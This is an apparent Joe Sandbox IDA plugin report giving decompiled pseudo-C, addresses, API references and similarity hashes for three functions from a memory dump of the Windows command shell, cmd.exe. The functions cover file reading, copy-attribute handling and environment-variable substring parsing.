Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
String ID: PE
API String ID: 3093239467-4258593460
Opcode ID: 5ec9f2938c9f1839036c75fff41477e1d83d2cb16fe8bf800a6b9b9a2437cb1f
Instruction ID: 94d0a73cd84d81291611591ff0ae240967f9218d0f2259c80f1f2242677e1f18
Opcode Fuzzy Hash: 5ec9f2938c9f1839036c75fff41477e1d83d2cb16fe8bf800a6b9b9a2437cb1f
Instruction Fuzzy Hash: E431DD74A00A18A7DB207B658C08FBE7BABABC4B21F94011AFD51D63C0DF30CD42CA65

Uniqueness

Uniqueness Score: -1.00%

Function 001D84FE Relevance: 13.6, APIs: 9, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001D84FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t14;
				LONG* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void** _t24;
				void** _t26;
				void* _t38;
				void* _t39;
				void* _t41;
				DWORD* _t42;
				LONG* _t44;
				void* _t45;

				_t24 = _t26;
				_t39 = __edx;
				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
				FlushFileBuffers(__eax);
				_t28 =  *_t24;
				E001BDB92( *_t24);
				_t30 = E001B5DB5(_t39, 0, _t28, _t28);
				 *_t24 = _t30;
				if(_t30 != 0xffffffff) {
					_t42 = _a4;
					_t12 =  ~_t42;
					__imp___get_osfhandle(2);
					SetFilePointer(_t12, _t30, _t12, 0);
					_t14 =  &_v8;
					__imp___get_osfhandle(0);
					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
					if(_t15 != 0) {
						if(_v8 != _t42) {
							goto L3;
						} else {
							_push(_t42);
							_push(_a12);
							_push(_a8);
							L001C82C7();
							_t30 =  *_t24;
							_t45 = _t45 + 0xc;
							_t44 = _t15;
							E001BDB92( *_t24);
							if(_t44 != 0) {
								goto L4;
							} else {
								_t21 = E001B5DB5(_t39, 1, _t39, _t39);
								 *_t24 = _t21;
								if(_t21 == 0xffffffff) {
									goto L1;
								} else {
									__imp___get_osfhandle(2);
									SetFilePointer(_t21, _t21, _t44, _t44);
									_t19 = 0;
								}
							}
						}
					} else {
						L3:
						_t30 =  *_t24;
						E001BDB92( *_t24);
						L4:
						 *_t24 =  *_t24 | 0xffffffff;
						goto L1;
					}
				} else {
					L1:
					E001BC5A2(_t30, 0x4000271f, 1, _t39);
					_t19 = 1;
				}
				return _t19;
			}

0x001d8505
0x001d8509
0x001d850d
0x001d8515
0x001d851b
0x001d851d
0x001d852d
0x001d852f
0x001d8534
0x001d854e
0x001d8557
0x001d855b
0x001d8563
0x001d856b
0x001d8575
0x001d857d
0x001d8585
0x001d8596
0x00000000
0x001d8598
0x001d8598
0x001d8599
0x001d859c
0x001d859f
0x001d85a4
0x001d85a6
0x001d85a9
0x001d85ab
0x001d85b2
0x00000000
0x001d85b4
0x001d85bb
0x001d85c0
0x001d85c5
0x00000000
0x001d85cb
0x001d85d0
0x001d85d8
0x001d85de
0x001d85de
0x001d85c5
0x001d85b2
0x001d8587
0x001d8587
0x001d8587
0x001d8589
0x001d858e
0x001d858e
0x00000000
0x001d858e
0x001d8536
0x001d8536
0x001d853e
0x001d8548
0x001d8548
0x001d85e6

APIs

_get_osfhandle.MSVCRT ref: 001D850D
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001D8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 001D8515

Part of subcall function 001BDB92: _close.MSVCRT ref: 001BDBC1

_get_osfhandle.MSVCRT ref: 001D855B
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 001D8563
_get_osfhandle.MSVCRT ref: 001D8575
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 001D857D
memcmp.MSVCRT ref: 001D859F
_get_osfhandle.MSVCRT ref: 001D85D0
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001D85D8

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
String ID:
API String ID: 332413853-0
Opcode ID: d790f1b3922333df7087e780ed60ab92a738c3be653f94ee9256aeea99ece4f0
Instruction ID: 15afab82ba18fd3dc10e761a1fd95996cf76df7b51d21a1a6739888017ada8a5
Opcode Fuzzy Hash: d790f1b3922333df7087e780ed60ab92a738c3be653f94ee9256aeea99ece4f0
Instruction Fuzzy Hash: DB216071600614ABDF286BB5AC4EFBA3BAEEF95360F104629F515C6290EF705C10DA61

Uniqueness

Uniqueness Score: -1.00%

Function 001B81E0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E001B81E0(intOrPtr _a4, long _a8, signed int* _a16) {
				signed int _v8;
				void* _v12;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void _v548;
				void* _v552;
				long _v556;
				char _v560;
				int _v564;
				void* _v568;
				void* _v572;
				void* _v580;
				void _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				long _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				long _t95;
				signed int _t97;
				signed int _t111;
				WCHAR* _t117;
				void* _t119;
				signed int _t120;
				WCHAR* _t122;
				int _t123;
				signed char* _t126;
				WCHAR* _t127;
				WCHAR* _t129;
				signed int _t134;
				WCHAR* _t135;
				void* _t136;
				char _t140;
				void* _t141;
				signed int* _t142;
				signed int _t153;
				signed int _t164;
				intOrPtr _t167;
				void* _t168;
				long _t169;
				WCHAR* _t170;
				char _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;

				_t176 = (_t174 & 0xfffffff8) - 0x44c;
				_t93 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t93 ^ _t176;
				_t95 = _a8;
				_t142 = _a16;
				_v1104 = _t95;
				_v1096 =  *(_t95 + 2) & 0x0000ffff;
				_t140 = 1;
				_t97 =  *_t142;
				_v1088 = _t142;
				_v560 = 1;
				_t167 = _a4;
				_t172 = 0;
				_v1100 = _t97 & 0x00002000;
				_v1092 = _t97 & 0x00000800;
				_v556 = 0x104;
				_v564 = 0;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t178 = _t176 + 0x18;
				if(E001C0C70( &_v1084, 0x7fe9) < 0 || E001C0C70( &_v548, 0x7fe9) < 0) {
					L23:
					_t172 = _t140;
					goto L24;
				} else {
					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
						L6:
						_t161 = _v1104;
						if(( *(_t161 + 4) & 0x00000010) != 0) {
							L24:
							_t140 = _t172;
							L25:
							_t172 = _t140;
							L26:
							_t140 = _t172;
							L27:
							_t172 = _t140;
							L17:
							__imp__??_V@YAXPAX@Z(_v28);
							__imp__??_V@YAXPAX@Z(_v564);
							_pop(_t168);
							_pop(_t173);
							_pop(_t141);
							return E001C6FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
						}
						_t151 = _v564;
						if(_v564 == 0) {
							_t151 =  &_v1084;
						}
						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
						_t161 = _v556;
						_v1096 = _t111;
						if(E001C51C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
							_push(_v1096);
							E001BC5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
							_t178 = _t178 + 0x10;
							goto L25;
						} else {
							_t152 = _v28;
							if(_v28 == 0) {
								_t152 =  &_v548;
							}
							_t163 = _v20;
							if(E001C51C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
								_t117 = _v564;
								__eflags = _t117;
								if(_t117 == 0) {
									_t117 =  &_v1084;
								}
								_t153 =  &_v548;
								E001C0D89(_t163, _t117);
							}
							if(_v1092 != _t172) {
								_t153 = _v28;
								__eflags = _t153;
								if(_t153 == 0) {
									_t153 =  &_v548;
								}
								_t161 = 0x232c;
								_t119 = E001D9583(_t153, 0x232c, 0x2328);
								__eflags = _t119 - _t140;
								if(_t119 == _t140) {
									goto L12;
								} else {
									__eflags =  *0x1dd544 - _t172; // 0x0
									if(__eflags == 0) {
										goto L26;
									}
									goto L25;
								}
							} else {
								L12:
								_t120 = _v1088;
								_t169 = _v1104;
								_t164 =  *(_t169 + 4);
								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
									_t122 = _v564;
									__eflags = _t122;
									if(_t122 == 0) {
										_t122 =  &_v1084;
									}
									_t161 = _t164 & 0xfffffffe;
									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
									__eflags = _t123;
									if(_t123 != 0) {
										goto L13;
									} else {
										_push(_t172);
										_push(GetLastError());
										E001BC5A2(_t154);
										goto L27;
									}
								}
								L13:
								_t155 = _v28;
								if(_v28 == 0) {
									_t155 =  &_v548;
								}
								_t161 =  *(_t169 + 4);
								if(E001B83F2(_t155,  *(_t169 + 4)) != 0) {
									_t155 = _v564;
									__eflags = _v564;
									if(_v564 == 0) {
										_t155 =  &_v1084;
									}
									_t161 =  *(_t169 + 4);
									_t170 = E001B83F2(_t155,  *(_t169 + 4));
									__eflags = _t170;
									if(_t170 == 0) {
										goto L15;
									} else {
										__eflags = _t170 - 0x4d3;
										if(_t170 == 0x4d3) {
											goto L27;
										}
										_t129 = _v28;
										__eflags = _t129;
										if(_t129 == 0) {
											_t129 =  &_v548;
										}
										E001C25D9(L"%s\r\n");
										E001BC5A2(_t155, _t170, _t172, _t129);
										_t178 = _t178 + 0x10;
										goto L17;
									}
								} else {
									L15:
									_t126 = _v1088;
									_t126[0x60] = _t126[0x60] + 1;
									if( *0x1f3cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
										_t127 = _v28;
										__eflags = _t127;
										if(_t127 == 0) {
											_t127 =  &_v548;
										}
										E001BC108(_t155, 0x400023a1, _t140, _t127);
										_t178 = _t178 + 0xc;
									}
									goto L17;
								}
							}
						}
					} else {
						_t134 = E001B8512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
						_v1100 = _t134;
						if(_t134 != 0) {
							_t159 = _v564;
							__eflags = _v564;
							if(_v564 == 0) {
								_t159 =  &_v1084;
							}
							_t161 = _v556;
							_t135 = E001C51C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
							__eflags = _t135;
							if(_t135 == 0) {
								_t160 = _v564;
								 *((char*)(_t167 + 0x11)) = _t140;
								__eflags = _v564;
								if(_v564 == 0) {
									_t160 =  &_v1084;
								}
								_t161 = 0x234e;
								_t136 = E001D9583(_t160, 0x234e, 0x2328);
								__eflags = _t136 - _t140;
								if(_t136 != _t140) {
									goto L23;
								} else {
									goto L6;
								}
							} else {
								_push(_v1100);
								E001BC5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
								_t178 = _t178 + 0x10;
								goto L23;
							}
						}
						goto L6;
					}
				}
			}

0x001b81e8
0x001b81ee
0x001b81f5
0x001b81fc
0x001b81ff
0x001b8202
0x001b820c
0x001b8210
0x001b8211
0x001b8213
0x001b821f
0x001b8227
0x001b822a
0x001b822c
0x001b823b
0x001b8240
0x001b824d
0x001b8254
0x001b825c
0x001b8268
0x001b826f
0x001b8280
0x001b8285
0x001b8298
0x001d01dd
0x001d01dd
0x00000000
0x001b82b7
0x001b82bb
0x001b82e0
0x001b82e0
0x001b82e8
0x001d01df
0x001d01df
0x001d01e1
0x001d01e1
0x001d01e3
0x001d01e3
0x001d01e5
0x001d01e5
0x001b83b4
0x001b83bb
0x001b83c9
0x001b83d9
0x001b83da
0x001b83db
0x001b83e6
0x001b83e6
0x001b82ee
0x001b82f7
0x001d0216
0x001d0216
0x001b8307
0x001b830a
0x001b8315
0x001b8320
0x001d021f
0x001d022d
0x001d0232
0x00000000
0x001b8326
0x001b8326
0x001b832f
0x001d0237
0x001d0237
0x001b8339
0x001b834e
0x001d0243
0x001d024a
0x001d024c
0x001d024e
0x001d024e
0x001d0253
0x001d025a
0x001d025a
0x001b8358
0x001d0264
0x001d026b
0x001d026d
0x001d026f
0x001d026f
0x001d027b
0x001d0280
0x001d0285
0x001d0287
0x00000000
0x001d028d
0x001d028d
0x001d0293
0x00000000
0x00000000
0x00000000
0x001d0299
0x001b835e
0x001b835e
0x001b835e
0x001b8362
0x001b836c
0x001b836f
0x001b837a
0x001d029e
0x001d02a5
0x001d02a7
0x001d02a9
0x001d02a9
0x001d02ad
0x001d02b2
0x001d02b8
0x001d02ba
0x00000000
0x001d02c0
0x001d02c0
0x001d02c7
0x001d02c8
0x00000000
0x001d02ce
0x001d02ba
0x001b8380
0x001b8380
0x001b8389
0x001b83e9
0x001b83e9
0x001b838b
0x001b8395
0x001d02d4
0x001d02db
0x001d02dd
0x001d02df
0x001d02df
0x001d02e3
0x001d02eb
0x001d02ed
0x001d02ef
0x00000000
0x001d02f5
0x001d02f5
0x001d02fb
0x00000000
0x00000000
0x001d0301
0x001d0308
0x001d030a
0x001d030c
0x001d030c
0x001d0319
0x001d0320
0x001d0325
0x00000000
0x001d0325
0x001b839b
0x001b839b
0x001b839b
0x001b839f
0x001b83a9
0x001d032d
0x001d0334
0x001d0336
0x001d0338
0x001d0338
0x001d0346
0x001d034b
0x001d034b
0x00000000
0x001b83a9
0x001b8395
0x001b8358
0x001b82c9
0x001b82cf
0x001b82d4
0x001b82da
0x001d01a4
0x001d01ab
0x001d01ad
0x001d01af
0x001d01af
0x001d01b3
0x001d01be
0x001d01c3
0x001d01c5
0x001d01ec
0x001d01f3
0x001d01f6
0x001d01f8
0x001d01fa
0x001d01fa
0x001d0203
0x001d0208
0x001d020d
0x001d020f
0x00000000
0x001d0211
0x00000000
0x001d0211
0x001d01c7
0x001d01c7
0x001d01d5
0x001d01da
0x00000000
0x001d01da
0x001d01c5
0x00000000
0x001b82da
0x001b82bb

APIs

memset.MSVCRT ref: 001B8254
memset.MSVCRT ref: 001B8280

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

??_V@YAXPAX@Z.MSVCRT ref: 001B83BB
??_V@YAXPAX@Z.MSVCRT ref: 001B83C9

Strings

%s, xrefs: 001D0314

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset
String ID: %s
API String ID: 2221118986-3043279178
Opcode ID: 3671c5ebb64d16ca079eeed9f3178fdd2f7f83dd82ea100a7ca5fc957b55a7a0
Instruction ID: 8b733f1123ece456984fac2e4a3ea45a1a6eabc156a44cab4607e9eeb9bd8f69
Opcode Fuzzy Hash: 3671c5ebb64d16ca079eeed9f3178fdd2f7f83dd82ea100a7ca5fc957b55a7a0
Instruction Fuzzy Hash: DF91CEB12093419BD735DF54C885BAFB7E9BFA8700F04492EF98987251DB34EA40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001B8F70 Relevance: 12.4, APIs: 8, Instructions: 447
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E001B8F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v20;
				wchar_t* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				wchar_t* _v52;
				signed int _v56;
				int _v60;
				wchar_t* _v64;
				intOrPtr _v68;
				signed int _v72;
				int _v76;
				signed short* _v80;
				void* _v84;
				signed short* _v88;
				signed short* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed short* _v104;
				void* __edi;
				void* __ebp;
				signed int _t127;
				int _t130;
				signed int* _t131;
				intOrPtr* _t135;
				signed int _t139;
				intOrPtr _t142;
				intOrPtr _t143;
				short* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				signed short* _t149;
				wchar_t* _t150;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				signed int _t158;
				signed short* _t162;
				void _t163;
				signed int _t165;
				intOrPtr _t167;
				signed int _t171;
				signed int _t173;
				signed short* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t181;
				signed short* _t190;
				wchar_t* _t191;
				intOrPtr* _t192;
				intOrPtr* _t195;
				signed int _t197;
				void* _t198;
				void* _t199;
				intOrPtr* _t203;
				intOrPtr* _t206;
				intOrPtr* _t209;
				void* _t212;
				intOrPtr* _t213;
				signed int _t219;
				signed short* _t220;
				signed short* _t226;
				signed short* _t228;
				wchar_t* _t229;
				short* _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				signed short* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				signed short* _t244;
				signed short* _t247;
				wchar_t* _t252;
				WCHAR* _t254;
				void* _t255;
				signed int _t256;
				intOrPtr* _t258;
				signed int _t260;
				void* _t262;
				intOrPtr* _t265;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				signed short* _t270;
				signed short* _t271;
				signed short* _t272;
				signed short* _t273;
				intOrPtr _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t282;

				_t229 = __edx;
				_push(0xfffffffe);
				_push(0x1dbe58);
				_push(E001C7290);
				_push( *[fs:0x0]);
				_t279 = _t278 - 0x54;
				_t127 =  *0x1dd0b4; // 0xea614d48
				_v12 = _v12 ^ _t127;
				_push(_t127 ^ _t277);
				 *[fs:0x0] =  &_v20;
				_v52 = __edx;
				_v56 = __ecx;
				_v60 = 0;
				_t252 = 0;
				_v40 = 0;
				_t262 = 0;
				_v36 = 0;
				_v8 = 0;
				_t130 = E001C00B0(0x4000);
				_v60 = _t130;
				if(_t130 == 0) {
					_t171 = _v56;
					if(_t171 == 0) {
						L74:
						_t131 = _a4;
						L75:
						 *_t131 = 0;
						L23:
						_v8 = 0xfffffffe;
						E001B93F4(_t252);
						 *[fs:0x0] = _v20;
						return _t262;
					}
					__imp__longjmp(_t171, 0xffffffff);
					L91:
					_t173 = _v56;
					if(_t173 == 0) {
						L73:
						_t262 = _v36;
						goto L74;
					}
					__imp__longjmp(_t173, 0xffffffff);
					L93:
					_t230 = _t229 - 2;
					_v64 = _t230;
					_v68 = _t173 - 1;
					L20:
					 *_t230 = 0;
					_t175 = _v52;
					_t254 = _v40;
					L21:
					_t135 = _v32;
					_v32 = _t135 + 2;
					_t255 = E001BCFBC(_t254);
					_v44 = _t255;
					if( *_t135 == 0x3a) {
						if( *0x1f3cc9 == 0 || _t255 == 0) {
							goto L22;
						} else {
							_t190 = _v32;
							_t139 =  *_t190 & 0x0000ffff;
							if(_t139 == 0x7e) {
								_t191 =  &(_t190[1]);
								_v32 = _t191;
								_t256 = wcstol(_t191,  &_v32, 0);
								_v72 = _t256;
								_t176 = _v44;
								if(_t256 >= 0) {
									L50:
									_t192 = _t176;
									_t66 = _t192 + 2; // 0x1c7292
									_t231 = _t66;
									do {
										_t142 =  *_t192;
										_t192 = _t192 + 2;
									} while (_t142 != 0);
									if(_t256 >= _t192 - _t231 >> 1) {
										_t195 = _t176;
										_t109 = _t195 + 2; // 0x1c7292
										_t232 = _t109;
										do {
											_t143 =  *_t195;
											_t195 = _t195 + 2;
										} while (_t143 != 0);
										_t197 = _t195 - _t232 >> 1;
										L54:
										if(_t197 < 0) {
											_t256 = 0;
											L58:
											_v72 = _t256;
											_t144 = _v32;
											if( *_t144 != 0x2c) {
												_t257 = _t176 + _t256 * 2;
												_t265 = _t176 + _t256 * 2;
												_t104 = _t265 + 2; // 0x2
												_t198 = _t104;
												do {
													_t145 =  *_t265;
													_t265 = _t265 + 2;
												} while (_t145 != 0);
												L72:
												_t267 = _t265 - _t198 >> 1;
												L63:
												_v48 = _t267;
												_t233 = _t176;
												_t78 = _t233 + 2; // 0x1c7292
												_t199 = _t78;
												do {
													_t146 =  *_t233;
													_t233 = _t233 + 2;
												} while (_t146 != 0);
												_t255 = _v44;
												E001C6826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
												if( *((short*)(_t255 + _t267 * 2)) != 0) {
													 *((short*)(_t255 + _t267 * 2)) = 0;
												}
												_t149 = _v32;
												_t237 =  &(_t149[1]);
												_v32 = _t237;
												_t131 = _a4;
												if(( *_t149 & 0x0000ffff) != _a8) {
													L98:
													_t262 = _v36;
													_t252 = _v40;
													goto L75;
												} else {
													 *_t131 = _t237 - _v52 >> 1;
													L45:
													_t262 = _t255;
													_v36 = _t262;
													_t252 = _v40;
													goto L23;
												}
											}
											_t150 = _t144 + 2;
											_v32 = _t150;
											_t268 = wcstol(_t150,  &_v32, 0);
											_v48 = _t268;
											if(_t268 < 0) {
												_t203 = _t176 + _t256 * 2;
												_t240 = _t203 + 2;
												do {
													_t152 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t152 != 0);
												_t267 = _t268 + (_t203 - _t240 >> 1);
												_v48 = _t267;
												if(_t267 < 0) {
													_t267 = 0;
												}
											}
											_v48 = _t267;
											_t257 = _t176 + _t256 * 2;
											_t206 = _t257;
											_t76 = _t206 + 2; // 0x2
											_t241 = _t76;
											do {
												_t153 =  *_t206;
												_t206 = _t206 + 2;
											} while (_t153 != 0);
											if(_t267 >= _t206 - _t241 >> 1) {
												_t269 = _t257;
												_t99 = _t269 + 2; // 0x2
												_t198 = _t99;
												do {
													_t154 =  *_t269;
													_t269 = _t269 + 2;
												} while (_t154 != 0);
												goto L72;
											}
											goto L63;
										}
										_t209 = _t176;
										_t67 = _t209 + 2; // 0x1c7292
										_t242 = _t67;
										do {
											_t155 =  *_t209;
											_t209 = _t209 + 2;
										} while (_t155 != 0);
										if(_t256 >= _t209 - _t242 >> 1) {
											_t258 = _t176;
											_t110 = _t258 + 2; // 0x1c7292
											_t212 = _t110;
											do {
												_t156 =  *_t258;
												_t258 = _t258 + 2;
											} while (_t156 != 0);
											_t256 = _t258 - _t212 >> 1;
										}
										goto L58;
									}
									_t197 = _t256;
									goto L54;
								}
								_t213 = _t176;
								_t64 = _t213 + 2; // 0x1c7292
								_t243 = _t64;
								do {
									_t157 =  *_t213;
									_t213 = _t213 + 2;
								} while (_t157 != 0);
								_t256 = _t256 + (_t213 - _t243 >> 1);
								_v72 = _t256;
								goto L50;
							}
							if(_t139 == 0x2a) {
								_t190 =  &(_t190[1]);
								_v32 = _t190;
								_v76 = 1;
							} else {
								_v76 = 0;
							}
							_t270 = _t190;
							_v104 = _t270;
							_t244 = _t270;
							while(1) {
								_t158 =  *_t190 & 0x0000ffff;
								if(_t158 == 0 || _t158 == 0x3d) {
									break;
								}
								_t190 =  &(_t244[1]);
								_v32 = _t190;
								_t244 = _t190;
							}
							if( *_t190 == 0) {
								L100:
								_t252 = _v40;
								goto L73;
							}
							_t178 = _t244 - _t270;
							_t179 = _t178 >> 1;
							if(_t178 == 0) {
								_t180 = _v56;
								if(_t180 == 0) {
									goto L100;
								}
								E001BC5A2(_t190, 0x234a, 1, _t244);
								_t282 = _t279 + 0xc;
								__imp__longjmp(_t180, 0xffffffff);
								L103:
								_t255 = _v44;
								memcpy(_t255, ??, ??);
								E001C1040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
								goto L45;
							}
							_t162 =  &(_t244[1]);
							_t271 = _t162;
							_v80 = _t271;
							while(1) {
								_t247 = _t162;
								_v32 = _t162;
								_t219 =  *_t162 & 0x0000ffff;
								if(_t219 == 0 || _t219 == _a8) {
									break;
								}
								_t162 =  &(_t247[1]);
							}
							_t131 = _a4;
							if( *_t162 == 0) {
								goto L98;
							}
							_t220 =  &(_t247[1]);
							_v32 = _t220;
							_v56 = _t247 - _t271 >> 1;
							 *_t131 = _t220 - _v52 >> 1;
							if( *_t255 == 0) {
								goto L45;
							}
							_t272 = _v60;
							_t163 = E001C1040(_t272, 0x2000, _t255);
							_v88 = _t272;
							_v84 = _t255;
							while(1) {
								L42:
								__imp___wcsnicmp(_t272, _v104, _t179);
								_t282 = _t279 + 0xc;
								if(_t163 != 0) {
									break;
								}
								_t270 =  &(_t272[_t179]);
								_push(_v56 + _v56);
								_push(_v80);
								if(_v76 != 0) {
									goto L103;
								}
								_t163 = memcpy(_t255, ??, ??);
								_t279 = _t282 + 0xc;
								_t255 = _t255 + _v56 * 2;
								_v84 = _t255;
								_v88 = _t270;
							}
							_t163 =  *_t272 & 0x0000ffff;
							 *_t255 = _t163;
							_t255 = _t255 + 2;
							_v84 = _t255;
							_t272 =  &(_t272[1]);
							_v88 = _t272;
							if(_t163 != 0) {
								goto L42;
							}
							_t255 = _v44;
							goto L45;
						}
					}
					L22:
					 *_a4 = _v32 - _t175 >> 1;
					_t262 = _t255;
					_v36 = _t262;
					_t252 = _v40;
					goto L23;
				}
				_t226 = __edx;
				_v32 = __edx;
				_t273 = __edx;
				_t229 =  *0x1f3cc9;
				while(1) {
					_t165 =  *_t226 & 0x0000ffff;
					if(_t165 == 0) {
						break;
					}
					_t181 = _a8;
					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
						break;
					} else {
						_t13 =  &(_t273[1]); // 0x2
						_t226 = _t13;
						_v32 = _t226;
						_t273 = _t226;
						continue;
					}
				}
				if( *_t226 == 0) {
					goto L73;
				}
				_t175 = _v52;
				if(_t273 == _t175) {
					goto L73;
				}
				_t276 = (_t273 - _t175 >> 1) + 1;
				_t252 = E001C00B0(_t276 + _t276);
				_v40 = _t252;
				if(_t252 == 0) {
					goto L91;
				}
				_t19 = _t276 - 1; // 0x0
				_t167 = _t19;
				if(_t276 == 0) {
					goto L21;
				}
				if(_t276 > 0x7fffffff) {
					if(_t276 == 0) {
						goto L21;
					}
					L95:
					 *_t252 = 0;
					goto L21;
				}
				if(_t167 > 0x7ffffffe) {
					goto L95;
				}
				_t228 = _t175;
				_t229 = _t252;
				_t173 = 0;
				while(1) {
					_v68 = _t173;
					_v64 = _t229;
					_v96 = _t276;
					_v92 = _t228;
					_v100 = _t167;
					if(_t276 == 0) {
						goto L93;
					}
					if(_t167 == 0) {
						L19:
						if(_t276 == 0) {
							goto L93;
						}
						goto L20;
					}
					_t260 =  *_t228 & 0x0000ffff;
					if(_t260 == 0) {
						goto L19;
					}
					 *_t229 = _t260;
					_t229 =  &(_t229[0]);
					_t228 =  &(_t228[1]);
					_t276 = _t276 - 1;
					_t167 = _t167 - 1;
					_t173 = _t173 + 1;
				}
				goto L93;
			}

0x001b8f70
0x001b8f75
0x001b8f77
0x001b8f7c
0x001b8f87
0x001b8f88
0x001b8f8e
0x001b8f93
0x001b8f98
0x001b8f9c
0x001b8fa4
0x001b8fa7
0x001b8faa
0x001b8fb1
0x001b8fb3
0x001b8fb6
0x001b8fb8
0x001b8fbb
0x001b8fc3
0x001b8fc8
0x001b8fcd
0x001d08a4
0x001d08a9
0x001b9369
0x001b9369
0x001b936c
0x001b936c
0x001b90d3
0x001b90d3
0x001b90da
0x001b90e4
0x001b90f2
0x001b90f2
0x001d08b2
0x001d08b8
0x001d08b8
0x001d08bd
0x001b9366
0x001b9366
0x00000000
0x001b9366
0x001d08c6
0x001d08cc
0x001d08cc
0x001d08cf
0x001d08d3
0x001b9096
0x001b9098
0x001b909b
0x001b909e
0x001b90a1
0x001b90a1
0x001b90aa
0x001b90b4
0x001b90b6
0x001b90bd
0x001b90fc
0x00000000
0x001b9102
0x001b9102
0x001b9105
0x001b910b
0x001b91ef
0x001b91f2
0x001b9205
0x001b9207
0x001b920a
0x001b920f
0x001b922a
0x001b922a
0x001b922c
0x001b922c
0x001b9230
0x001b9230
0x001b9233
0x001b9236
0x001b9241
0x001b93b6
0x001b93b8
0x001b93b8
0x001b93c0
0x001b93c0
0x001b93c3
0x001b93c6
0x001b93cd
0x001b9249
0x001b924b
0x001d08ed
0x001b926d
0x001b926d
0x001b9270
0x001b9277
0x001b9377
0x001b937a
0x001b937c
0x001b937c
0x001b9380
0x001b9380
0x001b9383
0x001b9386
0x001b935d
0x001b935f
0x001b92c7
0x001b92c7
0x001b92ca
0x001b92cc
0x001b92cc
0x001b92d0
0x001b92d0
0x001b92d3
0x001b92d6
0x001b92e2
0x001b92e7
0x001b92f1
0x001d08f6
0x001d08f6
0x001b92f7
